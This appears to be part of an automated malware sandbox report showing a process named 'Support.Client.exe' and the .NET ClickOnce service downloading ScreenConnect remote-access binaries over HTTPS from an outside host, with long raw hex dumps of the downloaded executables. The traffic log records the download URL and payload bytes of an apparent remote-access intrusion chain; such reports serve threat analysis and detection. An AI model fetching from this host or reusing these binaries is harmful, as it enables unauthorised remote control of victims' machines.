                                                                                                                                                                                                                                                2024-12-22 11:47:36 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 3c 99 98 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fc 08 00 00 06 00 00 00 00 00 00 92 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 19 78 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{<"0 @ `x@
                                                                                                                                                                                                                                                2024-12-22 11:47:36 UTC16384INData Raw: 0a 2a 00 00 1b 30 06 00 ef 0d 00 00 2c 00 00 11 73 ab 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 25 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 36 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4a 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4a 06 00 06 13 08 11 04 7b 16 03 00 04 6f 15 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a 11
                                                                                                                                                                                                                                                Data Ascii: *0,s}(u,rp(v(w(x}H((((~%-&~%s%(3+o8$o}{(,+{o(6{o)(J{o*(J{o(%o
                                                                                                                                                                                                                                                2024-12-22 11:47:37 UTC16384INData Raw: 7b 54 00 00 04 6f 0b 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 14 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f b8 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 14 03 00 0a 74 9a 00 00 01 17 6f 15 03 00 0a 26 02 7b 54 00 00 04 14 6f 7b 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0b 07 00 06 8c b6 00 00 02 a2 28 07 03 00 0a 02 7b 54 00 00 04 6f 0b 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0a 03 00 0a 6f 45 01 00 0a 2b 10
                                                                                                                                                                                                                                                Data Ascii: {To.{To*0b{To,M{Z(o{To{T{Toto&{To{(<*(<*0Grp%3%{To({To..'+5{Z(o-"(soE+
                                                                                                                                                                                                                                                2024-12-22 11:47:37 UTC16384INData Raw: 27 04 00 0a 28 b2 00 00 2b 28 b3 00 00 2b 6f 28 04 00 0a 2a c2 02 28 29 04 00 0a 02 7e 2a 04 00 0a 28 2b 04 00 0a 02 20 02 60 00 00 17 28 2c 04 00 0a 02 02 fe 06 dd 01 00 06 73 2d 04 00 0a 28 2e 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02 7b 9f 00 00 04 2a 22 02 03 7d 9f 00 00 04 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 1e 02 7b a3 00 00 04 2a 22 02 03 7d a3 00 00 04 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04
                                                                                                                                                                                                                                                Data Ascii: '(+(+o(*()~*(+ `(,s-(.*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}
                                                                                                                                                                                                                                                2024-12-22 11:47:37 UTC16384INData Raw: 0a 2c 07 02 28 a4 02 00 06 2a 02 6f 18 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 93 00 00 11 02 28 61 05 00 0a 2d 1d 02 28 9b 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 9b 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a2 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 a2 02 00 06 2a 02 6f 17 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 9f 02 00 06 2c 07 02 28 9f 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 a6 02 00 06 2c 07 02 28 a6 02 00 06 2a 02 6f c6 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 a1 02 00 06 2c 07 02 28 a1 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 aa 02 00 06 2c 07 02 28 aa 02 00 06 2a 02 28 99 02 00 06 2a 00 00 00 1b 30 06 00 f0 00 00 00 94 00 00 11 02 03 28 ce 01 00 06 02 6f c4 02 00 06 0a 12 00 28 63 05
                                                                                                                                                                                                                                                Data Ascii: ,(*o*0Q(a-((b,(*{,((b,(*o*(a-(,(*{,(,(*o*(a-(,(*{,(,(*(*0(o(c
                                                                                                                                                                                                                                                2024-12-22 11:47:37 UTC16384INData Raw: 06 00 0a 2a 32 02 7b 38 01 00 04 6f 09 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 0a 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 07 00 29 00 00 00 5a 00 00 11 02 02 7b 3a 01 00 04 73 8a 03 00 06 25 02 02 7b 39 01 00 04 0a 06 17 58 7d 39 01 00 04 06 6f 89 03 00 06 28 50 01 00 2b 2a 66 02 16 7d 39 01 00 04 02 28 83 03 00 06 02 7b 38 01 00 04 6f 0b 06 00 0a 2a 1e 02 28 83 03 00 06 2a 32 02 7b 38 01 00 04 6f 0c 06 00 0a 2a 32 02 7b 38 01 00 04 28 72 01 00
                                                                                                                                                                                                                                                Data Ascii: *2{8o*6{8o*0){:(t|:(O+3*0){:(t|:(O+3*0)Z{:s%{9X}9o(P+*f}9({8o*(*2{8o*2{8(r
                                                                                                                                                                                                                                                2024-12-22 11:47:37 UTC16384INData Raw: 3d 05 00 04 2c 0b 06 7b 3d 05 00 04 6f 22 00 00 0a dc 06 7b 3c 05 00 04 2c 0b 06 7b 3c 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 60 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 ad 01 00 06 02 20 16 22 00 00 17 28 2c 04 00 0a 02 17 28 b1 07 00 0a 02 22 00 00 80 3f 7d 73 01 00 04 02 7e bb 05 00 0a 28 0d 05 00 06 73 82 05 00 0a 7d 74 01 00 04 02 18 17 16 16 02 73 b2 07 00 0a 7d 71 01 00 04 2a 00 00 13 30 03 00 29 00 00 00 16 00 00 11 02 7b 78 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 01 00 00 1b 0c 02 7c 78 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03
                                                                                                                                                                                                                                                Data Ascii: =,{=o"{<,{<o",o"(`&*4iA5$0J( "(,("?}s~(s}ts}q*0){x(t|x(+3*0
                                                                                                                                                                                                                                                2024-12-22 11:47:37 UTC16384INData Raw: d1 01 00 2b 7e 85 05 00 04 fe 06 dd 0a 00 06 73 60 01 00 0a 28 21 00 00 2b 0c 28 92 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 41 05 00 06 28 c3 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 92 08 00 0a 02 6f 41 05 00 06 28 c3 04 00 06 7e aa 00 00 0a 02 6f b0 03 00 0a 6f 93 08 00 0a 2a 2e 28 c2 04 00 06 6f 5e 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 4a 05 00 06 2a 2e 28 c2 04 00 06 6f 4c 05 00 06 2a 2e 28 c2 04 00 06 6f 48 05 00 06 2a 2e 28 c2 04 00 06 6f 42 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 46 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 62 05 00 06 2a 2e 28 c2 04 00 06 6f 64 05 00 06 2a 2e 28 c2 04 00 06 6f 66 05 00 06 2a 2e 28 c2 04 00
                                                                                                                                                                                                                                                Data Ascii: +~s`(!+(%-&(oA(*~**(oA(~oo*.(o^*.(oD*.(oJ*.(oL*.(oH*.(oB*.(oD*.(oF*.(oD*.(ob*.(od*.(of*.(
                                                                                                                                                                                                                                                2024-12-22 11:47:37 UTC16384INData Raw: 25 80 d2 05 00 04 16 28 21 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 41 01 00 11 73 9f 09 00 0a 0a 06 03 7d a0 09 00 0a 02 06 fe 06 a1 09 00 0a 73 a2 09 00 0a 15 28 16 02 00 2b 7e a3 09 00 0a 25 2d 17 26 7e a4 09 00 0a fe 06 a5 09 00 0a 73 a6 09 00 0a 25 80 a3 09 00 0a 28 17 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 42 01 00 11 7e a7 09 00 0a 72 18 40 00 70 02 8c 64 00 00 01 28 1d 06 00 0a 6f a8 09 00 0a 0a 06 14 fe 03 0b de 0a 06 2c 06 06 6f 22 00 00 0a dc 07 2a 00 00 01 10 00 00 02 00 1b 00 07 22 00 0a 00 00 00 00 aa 28 01 03 00 0a 1c 16 73 02 03 00 0a 28 03 03 00 0a 2c 15 d0 23 03 00 01 28 bf 00 00 0a 6f 93 07 00 0a 28 10 06 00 06 2a 16 2a 56 28 11 06 00 06 2d 07 02 73 f2 06 00 06 2a 02 73 ed 06 00 06 2a 66 28 11 06 00 06 2d 09 02 03 04 73 e9 06
                                                                                                                                                                                                                                                Data Ascii: %(!+*0EAs}s(+~%-&~s%(+*0.B~r@pd(o,o"*"(s(,#(o(**V(-s*s*f(-s
                                                                                                                                                                                                                                                2024-12-22 11:47:37 UTC16384INData Raw: fc 01 00 0a 02 17 28 13 0b 00 0a 02 28 14 0b 00 0a 02 28 bb 01 00 0a 28 f9 01 00 0a 2a 76 02 28 23 08 00 0a 25 20 00 00 00 80 6f e5 04 00 0a 25 20 88 00 00 00 6f e6 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 91 01 00 11 0f 01 28 f0 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f3 01 00 0a 28 15 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f3 01 00 0a 28 86 00 00 0a 73 3b 05 00 0a 2a 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 f6 01 00 0a 17 28 10 07 00 06 0a 12 00 28 08 03 00 0a 2d 64 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 16 0b 00 0a 17 28 10 07 00 06 0b 12 01 28 08 03 00 0a 2d 3f 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 f1 01 00 0a 16 28 10 07 00 06 0c 12 02 28 08 03 00 0a 2d 1a 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 ed 01 00 0a 16 28 10 07 00 06 2a
                                                                                                                                                                                                                                                Data Ascii: ((((*v(#% o% o*0(,+((((,((s;*(((((-d(((((-?(((((-((((*


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                12192.168.2.449764104.168.134.2324437604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-22 11:47:39 UTC125OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                                                                                                Host: crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                2024-12-22 11:47:40 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                Content-Length: 548864
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Date: Sun, 22 Dec 2024 11:47:39 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-22 11:47:40 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a fa ad c1 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 ea 72 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 af 44 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELz" 0Xr D@
                                                                                                                                                                                                                                                2024-12-22 11:47:40 UTC16384INData Raw: 26 2a 1e 02 7b 6c 01 00 0a 2a 22 02 03 7d 6c 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6d 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 46 01 00 0a 0a 02 7b 6e 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 15 07 00 06 04 6f 15 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 15 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 15 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72 01
                                                                                                                                                                                                                                                Data Ascii: &*{l*"}l*:(<(m*0(<oF{n-(++,}n{n*>oo*>(o}p*03=-*(qo{p_,B{r,(stsu(,+&}p|r*o{p3{r
                                                                                                                                                                                                                                                2024-12-22 11:47:40 UTC16384INData Raw: 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c6 02 00 0a 0a 2b 30 03 04 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b5 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a7 0e 00 06 73 cb 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e9 04 00 06 28 80 00
                                                                                                                                                                                                                                                Data Ascii: :(}+(~+&*0TBE +(s+0s+&s+s+rpsz*Z(<(*~%-&~s%(+*0%(-*o(-*:((
                                                                                                                                                                                                                                                2024-12-22 11:47:40 UTC16384INData Raw: d4 00 00 11 02 03 6f 3a 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 86 03 00 0a 02 06 17 58 6f f2 02 00 0a 28 59 00 00 2b 73 39 04 00 0a 2a fe 02 25 2d 06 26 7e 98 01 00 0a 03 6f 8c 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 b9 0e 00 06 73 9f 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 9a 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3b 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00 00
                                                                                                                                                                                                                                                Data Ascii: o:3*oXo(Y+s9*%-&~o~%-&~s%(+(n(r+*n((*>s%}*s'~%-&Ds;%(+*(+(+-j+j(L(+*&f__`*v(
                                                                                                                                                                                                                                                2024-12-22 11:47:40 UTC16384INData Raw: fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 54 07 00 06 28 56 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 56 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 58 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5a 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5c 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5e 07 00 06 28 56 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 60 07 00 06 0b 12 01 fe 16 2c 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 62 07 00 06 0c 12 02 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 64 07 00 06 0d 12 03 28 2f 05 00 0a a2
                                                                                                                                                                                                                                                Data Ascii: %rp%(T(V%rp%(V(%rp%(X(%r"p%(Z(%r4p%(\(%r2p%(^(V%rHp%(`,oC%rhp%(b-oC%rp%(d(/
                                                                                                                                                                                                                                                2024-12-22 11:47:40 UTC16384INData Raw: f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2a 06 00 0a 28 81 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2b 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 36 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3e 0a 00 06 5a 1e 28 19 04 00 06 02 28 3f 0a 00 06 58 2a 86 02 03 04 28 3d 0a 00 06 02 05 75 98 00 00 02 7d dc 03 00 04 02 05 75 97 00 00 02 7d dd 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b dc 03 00 04 28 16
                                                                                                                                                                                                                                                Data Ascii: jX}{~*(+*0)Q{(+tO|(+3*0)Q{(-tO|(+3*V(6}}*{*{*Z(>Z((?X*(=u}u}*(c,{(
                                                                                                                                                                                                                                                2024-12-22 11:47:40 UTC16384INData Raw: 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 16 07 00 0a 0a 2b 26 06 6f 17 07 00 0a 0b 07 04 07 6f 0a 0c 00 06 02 05 07 6f 09 0c 00 06 28 0a 09 00 06 6f 0d 0c 00 06 28 02 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b 40 04 00 04 2a 1e 02 7b 41 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07 00
                                                                                                                                                                                                                                                Data Ascii: o-,o*290Dyo+&ooo(o(o-,o*29(<}=}>}?}@}A*{=*{>*{?*{@*{A*0G*~-:~(,~
                                                                                                                                                                                                                                                2024-12-22 11:47:40 UTC16384INData Raw: 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 60 01 00 0a 0a 03 04 0e 04 0e 05 06 28 32 02 00 0a 06 2a 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ac 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 b5 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 3b 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 36 02 00 06 2a 00 00 00 13 30 03 00 1b 00 00
                                                                                                                                                                                                                                                Data Ascii: :j******0iY(`(2*sjz(<*.s2*(<*2{3oB*(<*6{o{*(<*6{o{*.s8*(<*"(]*"(c*(<*0{;(+d(zo6*0
                                                                                                                                                                                                                                                2024-12-22 11:47:40 UTC16384INData Raw: 00 04 28 56 06 00 06 8c da 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 2f 0a 00 0a 16 6f 30 0a 00 0a 2a 36 02 7b 2f 0a 00 0a 17 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 22 05 00 0a 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 0b 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 22 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 12 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 52 0b 00 06 2a 3a 0f 01 fe 16 4e 01 00 02 6f 43 00 00 0a 2a 2e 73 16 10 00 06 80 2d 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c4 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a 2e
                                                                                                                                                                                                                                                Data Ascii: (V*(<*6{/o0*6{/o0*(<*J{"{#(1*(<*J{'{((1*.s%*(<*o"*oC*.s(*(<*oC*.s**(<*"(R*:NoC*.s-*(<*:oC*(<*.
                                                                                                                                                                                                                                                2024-12-22 11:47:40 UTC16384INData Raw: f7 02 01 00 10 00 4c b0 00 00 ad 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 89 2e 01 00 ad 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 ad 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 ad 3d 01 00 35 00 90 01 04 03 01 01 00 00 a0 6a 01 00 ad 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 ad 3d 01 00 c5 00 96 01 05 03 09 01 10 00 ba 36 01 00 ad 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 6c 50 01 00 ad 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 ad 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 1c 3b 01 00 ad 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 12 00 01 00 ad 3d 01 00 6d 00 a8 01 4d 03 81 01 10 00 52 3b 01 00 ad 3d 01 00 35 00 ab 01 61 03 01 20 10 00 84 e3 00 00 ad 3d 01 00 35 00 ad 01 6a 03 01 20 10 00 d3 34 01 00 ad 3d 01 00 35 00 b0 01 82 03 01
                                                                                                                                                                                                                                                Data Ascii: L=E.=mH&=+=5j==6=mlP=mO=m;=m&=mMR;=5a =5j 4=5


                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:06:46:56
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\Support.Client.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Support.Client.exe"
                                                                                                                                                                                                                                                Imagebase:0xc00000
                                                                                                                                                                                                                                                File size:83'424 bytes
